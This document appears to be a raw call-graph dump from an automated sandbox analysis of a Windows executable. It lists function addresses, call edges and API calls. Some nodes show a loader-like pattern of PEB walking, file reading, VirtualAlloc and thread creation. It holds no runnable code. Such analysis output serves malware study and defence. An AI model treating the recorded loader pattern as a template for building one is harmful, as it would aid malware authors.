108897->108902 108900->108752 108901->108874 108901->108877 108901->108879 
108901->108884 108901->108885 108901->108887 108901->108888 108901->108900 108901->108902 109068 407667 108901->109068 109073 462408 60 API calls 108901->109073 109074 409e5d 60 API calls 108901->109074 109075 407de1 108901->109075 109079 4089b3 69 API calls Mailbox 108901->109079 109080 40b73c 341 API calls 108901->109080 109081 4564da 60 API calls 108901->109081 109082 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108901->109082 109083 463c55 66 API calls Mailbox 108901->109083 108902->108847 108902->108853 108902->108855 108902->108859 108902->108860 108902->108861 108902->108862 108902->108864 108902->108866 108902->108867 108902->108869 108902->108871 108902->108873 108902->108886 108902->108894 108902->108897 108902->108900 108902->108901 108903 407de1 59 API calls 108902->108903 108904 469e4a 89 API calls 108902->108904 108906 409c90 59 API calls Mailbox 108902->108906 108907 4084c0 69 API calls 108902->108907 108908 40b73c 314 API calls 108902->108908 108910 45617e 59 API calls Mailbox 108902->108910 108911 4089b3 69 API calls 108902->108911 108912 4455d5 VariantClear 108902->108912 108913 44566b VariantClear 108902->108913 108914 408cd4 59 API calls Mailbox 108902->108914 108915 445419 VariantClear 108902->108915 108916 456e8f 59 API calls 108902->108916 108979 40e420 108902->108979 108986 40e6a0 108902->108986 109017 40f460 108902->109017 109037 4031ce IsDialogMessageW GetClassLongW 108902->109037 109044 486018 59 API calls 108902->109044 109045 469a15 59 API calls Mailbox 108902->109045 109046 45d4f2 59 API calls 108902->109046 109047 409837 108902->109047 109065 4560ef 59 API calls 2 library calls 108902->109065 109066 408401 59 API calls 108902->109066 109067 4082df 59 API calls Mailbox 108902->109067 108903->108902 108904->108902 108906->108902 108907->108902 108908->108902 108910->108902 108911->108902 108912->108902 108913->108902 108914->108902 108915->108902 108916->108902 108917->108776 
108918->108764 108919->108775 108920->108775 108922 409ebf 108921->108922 108943 409eed Mailbox 108921->108943 108923 420db6 Mailbox 59 API calls 108922->108923 108923->108943 108924 40b47a 108928 4409e5 108924->108928 108929 440055 108924->108929 108925 40b475 108926 408047 59 API calls 108925->108926 108927 40a057 108926->108927 108927->108744 110278 469e4a 89 API calls 4 library calls 108928->110278 110275 469e4a 89 API calls 4 library calls 108929->110275 108932 420db6 59 API calls Mailbox 108932->108943 108934 440064 108934->108744 108935 422d40 67 API calls __cinit 108935->108943 108937 407667 59 API calls 108937->108943 108939 408047 59 API calls 108939->108943 108940 456e8f 59 API calls 108940->108943 108941 4409d6 110277 469e4a 89 API calls 4 library calls 108941->110277 108943->108924 108943->108925 108943->108927 108943->108929 108943->108932 108943->108935 108943->108937 108943->108939 108943->108940 108943->108941 108944 40a55a 108943->108944 110273 40c8c0 341 API calls 2 library calls 108943->110273 110274 40b900 60 API calls Mailbox 108943->110274 110276 469e4a 89 API calls 4 library calls 108944->110276 108945->108764 108946->108706 108947->108709 108948->108716 108949->108709 108950->108709 108951->108717 108952->108727 108953->108728 108954->108728 108955->108731 108956->108735 108957->108775 108958->108775 108959->108775 108960->108775 108962 4084cb 108961->108962 108964 4084f2 108962->108964 110279 4089b3 69 API calls Mailbox 108962->110279 108964->108757 108965->108709 108966->108759 108968 408052 108967->108968 108969 40805a 108967->108969 110280 407f77 59 API calls 2 library calls 108968->110280 108969->108766 108971->108769 108972->108709 108974 407e62 108973->108974 108976 407e5f _memmove 108973->108976 108975 420db6 Mailbox 59 API calls 108974->108975 108975->108976 108976->108827 108977->108831 108978->108838 108980 40e451 108979->108980 108981 40e43d 108979->108981 109085 469e4a 89 API calls 4 library calls 108980->109085 109084 40df00 
341 API calls 2 library calls 108981->109084 108984 40e448 108984->108902 108985 443aa4 108985->108985 108987 40e6d5 108986->108987 108988 443aa9 108987->108988 108991 40e73f 108987->108991 108995 40e799 108987->108995 108989 409ea0 341 API calls 108988->108989 108990 443abe 108989->108990 109016 40e970 Mailbox 108990->109016 109087 469e4a 89 API calls 4 library calls 108990->109087 108994 407667 59 API calls 108991->108994 108991->108995 108992 407667 59 API calls 108992->108995 108997 443b04 108994->108997 108995->108992 108996 422d40 __cinit 67 API calls 108995->108996 108998 443b26 108995->108998 109002 40e95a 108995->109002 108995->109016 108996->108995 109088 422d40 108997->109088 108998->108902 109000 4084c0 69 API calls 109000->109016 109001 409ea0 341 API calls 109001->109016 109002->109016 109091 469e4a 89 API calls 4 library calls 109002->109091 109003 469e4a 89 API calls 109003->109016 109005 408d40 59 API calls 109005->109016 109013 40f195 109095 469e4a 89 API calls 4 library calls 109013->109095 109014 443e25 109014->108902 109015 40ea78 109015->108902 109016->109000 109016->109001 109016->109003 109016->109005 109016->109013 109016->109015 109086 407f77 59 API calls 2 library calls 109016->109086 109092 456e8f 59 API calls 109016->109092 109093 47c5c3 341 API calls 109016->109093 109094 47b53c 341 API calls Mailbox 109016->109094 109096 409c90 59 API calls Mailbox 109016->109096 109097 4793c6 341 API calls Mailbox 109016->109097 109018 40f650 109017->109018 109019 40f4ba 109017->109019 109022 407de1 59 API calls 109018->109022 109020 40f4c6 109019->109020 109021 44441e 109019->109021 109283 40f290 341 API calls 2 library calls 109020->109283 109285 47bc6b 109021->109285 109025 40f58c Mailbox 109022->109025 109182 463c37 109025->109182 109185 47df37 109025->109185 109188 47445a 109025->109188 109197 46cb7a 109025->109197 109277 404e4a 109025->109277 109026 40f630 109026->108902 109027 44442c 109027->109026 109325 469e4a 89 API calls 4 library calls 
109027->109325 109029 40f4fd 109029->109025 109029->109026 109029->109027 109031 40f5e3 109031->109026 109284 409c90 59 API calls Mailbox 109031->109284 109037->108902 109038->108846 109039->108851 109040->108902 109041->108854 109042->108854 109043->108854 109044->108902 109045->108902 109046->108902 109048 409851 109047->109048 109049 40984b 109047->109049 109050 43f5d3 __i64tow 109048->109050 109051 409899 109048->109051 109053 409857 __itow 109048->109053 109057 43f4da 109048->109057 109049->108902 110271 423698 83 API calls 4 library calls 109051->110271 109055 420db6 Mailbox 59 API calls 109053->109055 109056 409871 109055->109056 109056->109049 109059 407de1 59 API calls 109056->109059 109058 420db6 Mailbox 59 API calls 109057->109058 109063 43f552 Mailbox _wcscpy 109057->109063 109060 43f51f 109058->109060 109059->109049 109061 420db6 Mailbox 59 API calls 109060->109061 109062 43f545 109061->109062 109062->109063 109064 407de1 59 API calls 109062->109064 110272 423698 83 API calls 4 library calls 109063->110272 109064->109063 109065->108902 109066->108902 109067->108902 109069 420db6 Mailbox 59 API calls 109068->109069 109070 407688 109069->109070 109071 420db6 Mailbox 59 API calls 109070->109071 109072 407696 109071->109072 109072->108901 109073->108901 109074->108901 109076 407df0 __wsetenvp _memmove 109075->109076 109077 420db6 Mailbox 59 API calls 109076->109077 109078 407e2e 109077->109078 109078->108901 109079->108901 109080->108901 109081->108901 109082->108901 109083->108901 109084->108984 109085->108985 109086->109016 109087->109016 109098 422c44 109088->109098 109090 422d4b 109090->108995 109091->109016 109092->109016 109093->109016 109094->109016 109095->109014 109096->109016 109097->109016 109099 422c50 __close 109098->109099 109106 423217 109099->109106 109105 422c77 __close 109105->109090 109123 429c0b 109106->109123 109108 422c59 109109 422c88 DecodePointer DecodePointer 109108->109109 109110 422c65 109109->109110 109111 422cb5 109109->109111 
109120 422c82 109110->109120 109111->109110 109175 4287a4 59 API calls 2 library calls 109111->109175 109113 422d18 EncodePointer EncodePointer 109113->109110 109114 422cec 109114->109110 109118 422d06 EncodePointer 109114->109118 109177 428864 61 API calls 2 library calls 109114->109177 109115 422cc7 109115->109113 109115->109114 109176 428864 61 API calls 2 library calls 109115->109176 109118->109113 109119 422d00 109119->109110 109119->109118 109178 423220 109120->109178 109124 429c2f EnterCriticalSection 109123->109124 109125 429c1c 109123->109125 109124->109108 109130 429c93 109125->109130 109127 429c22 109127->109124 109154 4230b5 58 API calls 3 library calls 109127->109154 109131 429c9f __close 109130->109131 109132 429cc0 109131->109132 109133 429ca8 109131->109133 109141 429ce1 __close 109132->109141 109158 42881d 109132->109158 109155 42a16b 58 API calls __NMSG_WRITE 109133->109155 109135 429cad 109156 42a1c8 58 API calls 6 library calls 109135->109156 109139 429ceb 109144 429c0b __lock 58 API calls 109139->109144 109140 429cdc 109164 428b28 58 API calls __getptd_noexit 109140->109164 109141->109127 109142 429cb4 109157 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109142->109157 109146 429cf2 109144->109146 109148 429d17 109146->109148 109149 429cff 109146->109149 109166 422d55 109148->109166 109165 429e2b InitializeCriticalSectionAndSpinCount 109149->109165 109152 429d0b 109172 429d33 LeaveCriticalSection _doexit 109152->109172 109155->109135 109156->109142 109159 42882b 109158->109159 109160 42571c __crtCompareStringA_stat 58 API calls 109159->109160 109161 42885d 109159->109161 109163 42883e 109159->109163 109160->109159 109161->109139 109161->109140 109163->109159 109163->109161 109173 42a132 Sleep 109163->109173 109164->109141 109165->109152 109167 422d5e RtlFreeHeap 109166->109167 109171 422d87 _free 109166->109171 109168 422d73 109167->109168 109167->109171 109174 428b28 58 API calls __getptd_noexit 109168->109174 
109170 422d79 GetLastError 109170->109171 109171->109152 109172->109141 109173->109163 109174->109170 109175->109115 109176->109114 109177->109119 109181 429d75 LeaveCriticalSection 109178->109181 109180 422c87 109180->109105 109181->109180 109326 46445a GetFileAttributesW 109182->109326 109330 47cadd 109185->109330 109187 47df47 109187->109031 109189 409837 84 API calls 109188->109189 109190 474494 109189->109190 109462 406240 109190->109462 109192 4744a4 109193 4744c9 109192->109193 109194 409ea0 341 API calls 109192->109194 109196 4744cd 109193->109196 109487 409a98 59 API calls Mailbox 109193->109487 109194->109193 109196->109031 109198 407667 59 API calls 109197->109198 109199 46cbaf 109198->109199 109200 407667 59 API calls 109199->109200 109201 46cbb8 109200->109201 109202 46cbcc 109201->109202 109703 409b3c 59 API calls 109201->109703 109204 409837 84 API calls 109202->109204 109205 46cbe9 109204->109205 109206 46ccea 109205->109206 109207 46cc0b 109205->109207 109212 46cd1a Mailbox 109205->109212 109507 404ddd 109206->109507 109208 409837 84 API calls 109207->109208 109210 46cc17 109208->109210 109213 408047 59 API calls 109210->109213 109212->109031 109217 46cc23 109213->109217 109214 407667 59 API calls 109216 46cd4b 109214->109216 109215 404ddd 136 API calls 109218 46cd16 109215->109218 109219 407667 59 API calls 109216->109219 109221 46cc37 109217->109221 109222 46cc69 109217->109222 109218->109212 109218->109214 109220 46cd54 109219->109220 109224 407667 59 API calls 109220->109224 109225 408047 59 API calls 109221->109225 109223 409837 84 API calls 109222->109223 109226 46cc76 109223->109226 109227 46cd5d 109224->109227 109228 46cc47 109225->109228 109229 408047 59 API calls 109226->109229 109230 407667 59 API calls 109227->109230 109704 407cab 109228->109704 109233 46cc82 109229->109233 109234 46cd66 109230->109234 109711 464a31 GetFileAttributesW 109233->109711 109237 409837 84 API calls 109234->109237 109235 409837 84 API calls 109238 46cc5d 
109235->109238 109240 46cd73 109237->109240 109241 407b2e 59 API calls 109238->109241 109239 46cc8b 109242 46cc9e 109239->109242 109245 4079f2 59 API calls 109239->109245 109531 40459b 109240->109531 109241->109222 109244 409837 84 API calls 109242->109244 109252 46cca4 109242->109252 109247 46cccb 109244->109247 109245->109242 109246 46cd8e 109582 4079f2 109246->109582 109712 4637ef 75 API calls Mailbox 109247->109712 109251 46cdd1 109254 408047 59 API calls 109251->109254 109252->109212 109253 4079f2 59 API calls 109255 46cdae 109253->109255 109256 46cddf 109254->109256 109255->109251 109713 407bcc 109255->109713 109585 407b2e 109256->109585 109260 46cdc3 109262 407bcc 59 API calls 109260->109262 109261 407b2e 59 API calls 109263 46cdfb 109261->109263 109262->109251 109264 407b2e 59 API calls 109263->109264 109265 46ce09 109264->109265 109266 409837 84 API calls 109265->109266 109267 46ce15 109266->109267 109594 464071 109267->109594 109269 46ce26 109270 463c37 3 API calls 109269->109270 109271 46ce30 109270->109271 109272 409837 84 API calls 109271->109272 109276 46ce61 109271->109276 109273 46ce4e 109272->109273 109648 469155 109273->109648 109275 404e4a 84 API calls 109275->109212 109276->109275 109278 404e54 109277->109278 109280 404e5b 109277->109280 109279 4253a6 __fcloseall 83 API calls 109278->109279 109279->109280 109281 404e6a 109280->109281 109282 404e7b FreeLibrary 109280->109282 109281->109031 109282->109281 109283->109029 109284->109031 109286 47bc96 109285->109286 109287 47bcb0 109285->109287 110263 469e4a 89 API calls 4 library calls 109286->110263 110264 47a213 59 API calls Mailbox 109287->110264 109290 47bcbb 109291 409ea0 340 API calls 109290->109291 109292 47bd1c 109291->109292 109293 47bca8 Mailbox 109292->109293 109294 47bdae 109292->109294 109297 47bd5d 109292->109297 109293->109027 109295 47be04 109294->109295 109296 47bdb4 109294->109296 109295->109293 109298 409837 84 API calls 109295->109298 110266 46791a 59 API calls 109296->110266 
110265 4672df 59 API calls Mailbox 109297->110265 109299 47be16 109298->109299 109302 407e4f 59 API calls 109299->109302 109305 47be3a CharUpperBuffW 109302->109305 109303 47bdd7 110267 405d41 59 API calls Mailbox 109303->110267 109304 47bd8d 109307 40f460 340 API calls 109304->109307 109309 47be54 109305->109309 109307->109293 109308 47bddf Mailbox 109312 40fce0 340 API calls 109308->109312 109310 47bea7 109309->109310 109311 47be5b 109309->109311 109313 409837 84 API calls 109310->109313 110268 4672df 59 API calls Mailbox 109311->110268 109312->109293 109314 47beaf 109313->109314 110269 409e5d 60 API calls 109314->110269 109317 47be89 109318 40f460 340 API calls 109317->109318 109318->109293 109319 47beb9 109319->109293 109320 409837 84 API calls 109319->109320 109321 47bed4 109320->109321 110270 405d41 59 API calls Mailbox 109321->110270 109323 47bee4 109324 40fce0 340 API calls 109323->109324 109324->109293 109325->109026 109327 463c3e 109326->109327 109328 464475 FindFirstFileW 109326->109328 109327->109031 109328->109327 109329 46448a FindClose 109328->109329 109329->109327 109331 409837 84 API calls 109330->109331 109332 47cb1a 109331->109332 109349 47cb61 Mailbox 109332->109349 109368 47d7a5 109332->109368 109334 47cdb9 109335 47cf2e 109334->109335 109339 47cdc7 109334->109339 109418 47d8c8 92 API calls Mailbox 109335->109418 109338 47cf3d 109338->109339 109341 47cf49 109338->109341 109381 47c96e 109339->109381 109340 409837 84 API calls 109352 47cbb2 Mailbox 109340->109352 109341->109349 109346 47ce00 109396 420c08 109346->109396 109349->109187 109350 47ce33 109403 4092ce 109350->109403 109351 47ce1a 109402 469e4a 89 API calls 4 library calls 109351->109402 109352->109334 109352->109340 109352->109349 109400 47fbce 59 API calls 2 library calls 109352->109400 109401 47cfdf 61 API calls 2 library calls 109352->109401 109355 47ce25 GetCurrentProcess TerminateProcess 109355->109350 109360 47cfa4 109360->109349 109364 47cfb8 FreeLibrary 109360->109364 109361 
47ce6b 109415 47d649 107 API calls _free 109361->109415 109364->109349 109366 47ce7c 109366->109360 109416 408d40 59 API calls Mailbox 109366->109416 109417 409d3c 60 API calls Mailbox 109366->109417 109419 47d649 107 API calls _free 109366->109419 109369 407e4f 59 API calls 109368->109369 109370 47d7c0 CharLowerBuffW 109369->109370 109420 45f167 109370->109420 109374 407667 59 API calls 109375 47d7f9 109374->109375 109427 40784b 109375->109427 109377 47d810 109440 407d2c 109377->109440 109379 47d81c Mailbox 109380 47d858 Mailbox 109379->109380 109444 47cfdf 61 API calls 2 library calls 109379->109444 109380->109352 109382 47c989 109381->109382 109386 47c9de 109381->109386 109383 420db6 Mailbox 59 API calls 109382->109383 109384 47c9ab 109383->109384 109385 420db6 Mailbox 59 API calls 109384->109385 109384->109386 109385->109384 109387 47da50 109386->109387 109388 47dc79 Mailbox 109387->109388 109395 47da73 _strcat _wcscpy __wsetenvp 109387->109395 109388->109346 109389 409be6 59 API calls 109389->109395 109390 409b3c 59 API calls 109390->109395 109391 409b98 59 API calls 109391->109395 109392 409837 84 API calls 109392->109395 109393 42571c 58 API calls __crtCompareStringA_stat 109393->109395 109395->109388 109395->109389 109395->109390 109395->109391 109395->109392 109395->109393 109451 465887 61 API calls 2 library calls 109395->109451 109398 420c1d 109396->109398 109397 420cb5 VirtualProtect 109399 420c83 109397->109399 109398->109397 109398->109399 109399->109350 109399->109351 109400->109352 109401->109352 109402->109355 109404 4092d6 109403->109404 109405 420db6 Mailbox 59 API calls 109404->109405 109406 4092e4 109405->109406 109408 4092f0 109406->109408 109452 4091fc 59 API calls Mailbox 109406->109452 109409 409050 109408->109409 109453 409160 109409->109453 109411 40905f 109412 420db6 Mailbox 59 API calls 109411->109412 109413 4090fb 109411->109413 109412->109413 109413->109366 109414 408d40 59 API calls Mailbox 109413->109414 109414->109361 
109415->109366 109416->109366 109417->109366 109418->109338 109419->109366 109422 45f192 __wsetenvp 109420->109422 109421 45f1d1 109421->109374 109421->109379 109422->109421 109423 45f1c7 109422->109423 109425 45f278 109422->109425 109423->109421 109445 4078c4 61 API calls 109423->109445 109425->109421 109446 4078c4 61 API calls 109425->109446 109428 4078b7 109427->109428 109429 40785a 109427->109429 109431 407d2c 59 API calls 109428->109431 109429->109428 109430 407865 109429->109430 109432 407880 109430->109432 109433 43eb09 109430->109433 109437 407888 _memmove 109431->109437 109447 407f27 59 API calls Mailbox 109432->109447 109448 408029 109433->109448 109436 43eb13 109438 420db6 Mailbox 59 API calls 109436->109438 109437->109377 109439 43eb33 109438->109439 109441 407d3a 109440->109441 109443 407d43 _memmove 109440->109443 109442 407e4f 59 API calls 109441->109442 109441->109443 109442->109443 109443->109379 109444->109380 109445->109423 109446->109425 109447->109437 109449 420db6 Mailbox 59 API calls 109448->109449 109450 408033 109449->109450 109450->109436 109451->109395 109452->109408 109454 409169 Mailbox 109453->109454 109455 43f19f 109454->109455 109459 409173 109454->109459 109456 420db6 Mailbox 59 API calls 109455->109456 109458 43f1ab 109456->109458 109457 40917a 109457->109411 109459->109457 109461 409c90 59 API calls Mailbox 109459->109461 109461->109459 109488 407a16 109462->109488 109464 40646a 109495 40750f 109464->109495 109466 406484 Mailbox 109466->109192 109469 43dff6 109505 45f8aa 91 API calls 4 library calls 109469->109505 109470 40750f 59 API calls 109481 406265 109470->109481 109474 407d8c 59 API calls 109474->109481 109475 43e004 109476 40750f 59 API calls 109475->109476 109478 43e01a 109476->109478 109477 406799 _memmove 109506 45f8aa 91 API calls 4 library calls 109477->109506 109478->109466 109479 43df92 109480 408029 59 API calls 109479->109480 109483 43df9d 109480->109483 109481->109464 109481->109469 109481->109470 109481->109474 
109481->109477 109481->109479 109484 407e4f 59 API calls 109481->109484 109493 405f6c 60 API calls 109481->109493 109494 405d41 59 API calls Mailbox 109481->109494 109503 405e72 60 API calls 109481->109503 109504 407924 59 API calls 2 library calls 109481->109504 109486 420db6 Mailbox 59 API calls 109483->109486 109485 40643b CharUpperBuffW 109484->109485 109485->109481 109486->109477 109487->109196 109489 420db6 Mailbox 59 API calls 109488->109489 109490 407a3b 109489->109490 109491 408029 59 API calls 109490->109491 109492 407a4a 109491->109492 109492->109481 109493->109481 109494->109481 109496 407522 _memmove 109495->109496 109497 4075af 109495->109497 109498 420db6 Mailbox 59 API calls 109496->109498 109499 420db6 Mailbox 59 API calls 109497->109499 109501 407529 109498->109501 109499->109496 109500 407552 109500->109466 109501->109500 109502 420db6 Mailbox 59 API calls 109501->109502 109502->109500 109503->109481 109504->109481 109505->109475 109506->109466 109722 404bb5 109507->109722 109512 43d8e6 109515 404e4a 84 API calls 109512->109515 109513 404e08 LoadLibraryExW 109732 404b6a 109513->109732 109517 43d8ed 109515->109517 109519 404b6a 3 API calls 109517->109519 109521 43d8f5 109519->109521 109520 404e2f 109520->109521 109522 404e3b 109520->109522 109758 404f0b 109521->109758 109523 404e4a 84 API calls 109522->109523 109525 404e40 109523->109525 109525->109215 109525->109218 109528 43d91c 109766 404ec7 109528->109766 109532 407667 59 API calls 109531->109532 109533 4045b1 109532->109533 109534 407667 59 API calls 109533->109534 109535 4045b9 109534->109535 109536 407667 59 API calls 109535->109536 109537 4045c1 109536->109537 109538 407667 59 API calls 109537->109538 109539 4045c9 109538->109539 109540 43d4d2 109539->109540 109541 4045fd 109539->109541 109542 408047 59 API calls 109540->109542 109543 40784b 59 API calls 109541->109543 109544 43d4db 109542->109544 109545 40460b 109543->109545 109940 407d8c 109544->109940 109547 407d2c 59 API calls 
404ac2 111341->111342 111343 404b2b GetSystemInfo 111341->111343 111355 404b37 111342->111355 111344 404af8 111343->111344 111344->111323 111345->111339 111345->111340 111348 404ad4 111351 404b37 2 API calls 111348->111351 111349 404b1f GetSystemInfo 111350 404ae9 111349->111350 111350->111344 111353 404aef FreeLibrary 111350->111353 111352 404adc GetNativeSystemInfo 111351->111352 111352->111350 111353->111344 111356 404ad0 111355->111356 111357 404b40 LoadLibraryA 111355->111357 111356->111348 111356->111349 111357->111356 111358 404b51 GetProcAddress 111357->111358 111358->111356 111359 d6f600 111373 d6d250 111359->111373 111361 d6f6fc 111376 d6f4f0 111361->111376 111379 d70730 GetPEB 111373->111379 111375 d6d8db 111375->111361 111377 d6f4f9 Sleep 111376->111377 111378 d6f507 111377->111378 111380 d7075a 111379->111380 111380->111375 111381 ac5a3b 111382 ac5a45 111381->111382 111387 ac4f7c 111381->111387 111383 ac51ae 111382->111383 111384 ac5a4b CreateThread 111382->111384 111385 ac5a59 RtlExitUserThread 111384->111385 111391 ac5b1d 111385->111391 111386 ac4f88 111387->111386 111388 ac5d20 2 API calls 111387->111388 111390 ac4f99 111388->111390 111392 ac5d20 2 API calls 111391->111392 111393 ac5b3c 111392->111393 111393->111393 111394 401078 111399 40708b 111394->111399 111396 40108c 111397 422d40 __cinit 67 API calls 111396->111397 111398 401096 111397->111398 111400 40709b __ftell_nolock 111399->111400 111401 407667 59 API calls 111400->111401 111402 407151 111401->111402 111403 404706 61 API calls 111402->111403 111404 40715a 111403->111404 111430 42050b 111404->111430 111407 407cab 59 API calls 111408 407173 111407->111408 111409 403f74 59 API calls 111408->111409 111410 407182 111409->111410 111411 407667 59 API calls 111410->111411 111412 40718b 111411->111412 111413 407d8c 59 API calls 111412->111413 111414 407194 RegOpenKeyExW 111413->111414 111415 43e8b1 RegQueryValueExW 111414->111415 111416 4071b6 Mailbox 111414->111416 111417 43e943 RegCloseKey 
111415->111417 111418 43e8ce 111415->111418 111416->111396 111417->111416 111429 43e955 _wcscat Mailbox __wsetenvp 111417->111429 111419 420db6 Mailbox 59 API calls 111418->111419 111420 43e8e7 111419->111420 111421 40522e 59 API calls 111420->111421 111422 43e8f2 RegQueryValueExW 111421->111422 111424 43e90f 111422->111424 111426 43e929 111422->111426 111423 4079f2 59 API calls 111423->111429 111425 407bcc 59 API calls 111424->111425 111425->111426 111426->111417 111427 407de1 59 API calls 111427->111429 111428 403f74 59 API calls 111428->111429 111429->111416 111429->111423 111429->111427 111429->111428 111431 431940 __ftell_nolock 111430->111431 111432 420518 GetFullPathNameW 111431->111432 111433 42053a 111432->111433 111434 407bcc 59 API calls 111433->111434 111435 407165 111434->111435 111435->111407 111436 acaaf0 111437 acab06 111436->111437 111441 acab57 111437->111441 111442 ac6490 111437->111442 111444 ac5f10 111442->111444 111445 ac5d90 111442->111445 111443 ac6084 SetFilePointerEx 111443->111444 111444->111443 111444->111445 111446 affaf0 111445->111446 111447 affafd 111446->111447 111449 affb84 111446->111449 111448 affb2a 111447->111448 111447->111449 111451 b0032f 111448->111451 111465 b01a1b 21 API calls 2 library calls 111448->111465 111450 affc05 111449->111450 111457 affbda 111449->111457 111452 affc38 111450->111452 111464 b00fe0 21 API calls __startOneArgErrorHandling 111450->111464 111451->111441 111452->111441 111454 b008d6 111454->111441 111456 affc22 111456->111441 111457->111452 111458 b01167 111457->111458 111459 b0116e 111457->111459 111466 b00ff7 21 API calls __startOneArgErrorHandling 111458->111466 111467 b00fe0 21 API calls __startOneArgErrorHandling 111459->111467 111462 b0116c 111462->111441 111463 b01173 111463->111441 111464->111456 111465->111454 111466->111462 111467->111463 111468 d6fbab 111469 d6fbb0 111468->111469 111470 d6d250 GetPEB 111469->111470 111471 d6fbbc 111470->111471 111472 d6fc70 111471->111472 111473 d6fbda 
111471->111473 111490 d70520 9 API calls 111472->111490 111477 d6f880 111473->111477 111476 d6fc57 111478 d6d250 GetPEB 111477->111478 111479 d6f91f 111478->111479 111482 d6f979 VirtualAlloc 111479->111482 111484 d6f95d 111479->111484 111488 d6fa80 CloseHandle 111479->111488 111489 d6fa90 VirtualFree 111479->111489 111491 d70790 GetPEB 111479->111491 111481 d6f950 CreateFileW 111481->111479 111481->111484 111483 d6f99a ReadFile 111482->111483 111482->111484 111483->111484 111487 d6f9b8 VirtualAlloc 111483->111487 111485 d6fb6c VirtualFree 111484->111485 111486 d6fb7a 111484->111486 111485->111486 111486->111476 111487->111479 111487->111484 111488->111479 111489->111479 111490->111476 111492 d707ba 111491->111492 111492->111481 111493 43fdfc 111498 40ab30 Mailbox _memmove 111493->111498 111495 45617e Mailbox 59 API calls 111519 40a057 111495->111519 111497 420db6 59 API calls Mailbox 111497->111498 111498->111497 111500 40b525 111498->111500 111498->111519 111520 407de1 59 API calls 111498->111520 111523 409f37 Mailbox 111498->111523 111524 47bc6b 341 API calls 111498->111524 111527 40b2b6 111498->111527 111529 409ea0 341 API calls 111498->111529 111530 44086a 111498->111530 111532 440878 111498->111532 111534 44085c 111498->111534 111535 40b21c 111498->111535 111538 456e8f 59 API calls 111498->111538 111544 47445a 341 API calls 111498->111544 111545 47df23 111498->111545 111548 468715 111498->111548 111552 482141 111498->111552 111590 47e4d1 111498->111590 111596 47c2e0 111498->111596 111628 467956 111498->111628 111634 45617e 111498->111634 111639 409c90 59 API calls Mailbox 111498->111639 111643 47c193 85 API calls 2 library calls 111498->111643 111645 469e4a 89 API calls 4 library calls 111500->111645 111502 420db6 59 API calls Mailbox 111502->111523 111503 40b47a 111504 4409e5 111503->111504 111505 440055 111503->111505 111650 469e4a 89 API calls 4 library calls 111504->111650 111644 469e4a 89 API calls 4 library calls 111505->111644 111507 40b475 111513 
408047 59 API calls 111507->111513 111510 440064 111513->111519 111514 407667 59 API calls 111514->111523 111516 408047 59 API calls 111516->111523 111517 456e8f 59 API calls 111517->111523 111518 422d40 67 API calls __cinit 111518->111523 111520->111498 111521 4409d6 111649 469e4a 89 API calls 4 library calls 111521->111649 111523->111502 111523->111503 111523->111505 111523->111507 111523->111514 111523->111516 111523->111517 111523->111518 111523->111519 111523->111521 111525 40a55a 111523->111525 111637 40c8c0 341 API calls 2 library calls 111523->111637 111638 40b900 60 API calls Mailbox 111523->111638 111524->111498 111648 469e4a 89 API calls 4 library calls 111525->111648 111642 40f6a3 341 API calls 111527->111642 111529->111498 111646 409c90 59 API calls Mailbox 111530->111646 111647 469e4a 89 API calls 4 library calls 111532->111647 111534->111495 111534->111519 111640 409d3c 60 API calls Mailbox 111535->111640 111537 40b22d 111641 409d3c 60 API calls Mailbox 111537->111641 111538->111498 111544->111498 111546 47cadd 130 API calls 111545->111546 111547 47df33 111546->111547 111547->111498 111549 468723 111548->111549 111550 46871e 111548->111550 111549->111498 111651 4677b3 111550->111651 111553 407667 59 API calls 111552->111553 111554 482158 111553->111554 111555 409837 84 API calls 111554->111555 111556 482167 111555->111556 111557 407a16 59 API calls 111556->111557 111558 48217a 111557->111558 111559 409837 84 API calls 111558->111559 111560 482187 111559->111560 111561 4821a1 111560->111561 111562 482215 111560->111562 111674 409b3c 59 API calls 111561->111674 111564 409837 84 API calls 111562->111564 111566 48221a 111564->111566 111565 4821a6 111567 482204 111565->111567 111571 4821bd 111565->111571 111568 482228 111566->111568 111569 482246 111566->111569 111675 409a98 59 API calls Mailbox 111567->111675 111676 409a98 59 API calls Mailbox 111568->111676 111573 48225b 111569->111573 111677 409b3c 59 API calls 111569->111677 111576 40784b 59 API calls 
111571->111576 111574 482270 111573->111574 111678 409b3c 59 API calls 111573->111678 111679 407f77 59 API calls 2 library calls 111574->111679 111575 482211 Mailbox 111575->111498 111580 4821ca 111576->111580 111582 407b2e 59 API calls 111580->111582 111581 48228a 111680 45f401 62 API calls Mailbox 111581->111680 111584 4821d8 111582->111584 111585 40784b 59 API calls 111584->111585 111586 4821f1 111585->111586 111588 407b2e 59 API calls 111586->111588 111587 4821ff 111681 409a3c 59 API calls Mailbox 111587->111681 111588->111587 111593 47e4e4 111590->111593 111591 409837 84 API calls 111592 47e521 111591->111592 111682 467729 111592->111682 111593->111591 111595 47e4f3 111593->111595 111595->111498 111597 407667 59 API calls 111596->111597 111598 47c2f4 111597->111598 111599 407667 59 API calls 111598->111599 111600 47c2fc 111599->111600 111601 407667 59 API calls 111600->111601 111602 47c304 111601->111602 111603 409837 84 API calls 111602->111603 111627 47c312 111603->111627 111604 407924 59 API calls 111604->111627 111605 407bcc 59 API calls 111605->111627 111606 47c4fb 111612 47c528 Mailbox 111606->111612 111725 409a3c 59 API calls Mailbox 111606->111725 111608 47c4e2 111611 407cab 59 API calls 111608->111611 111609 47c4fd 111614 407cab 59 API calls 111609->111614 111610 408047 59 API calls 111610->111627 111613 47c4ef 111611->111613 111612->111498 111617 407b2e 59 API calls 111613->111617 111615 47c50c 111614->111615 111618 407b2e 59 API calls 111615->111618 111616 407e4f 59 API calls 111620 47c3a9 CharUpperBuffW 111616->111620 111617->111606 111618->111606 111619 407e4f 59 API calls 111621 47c469 CharUpperBuffW 111619->111621 111723 40843a 68 API calls 111620->111723 111724 40c5a7 69 API calls 2 library calls 111621->111724 111624 409837 84 API calls 111624->111627 111625 407cab 59 API calls 111625->111627 111626 407b2e 59 API calls 111626->111627 111627->111604 111627->111605 111627->111606 111627->111608 111627->111609 111627->111610 111627->111612 
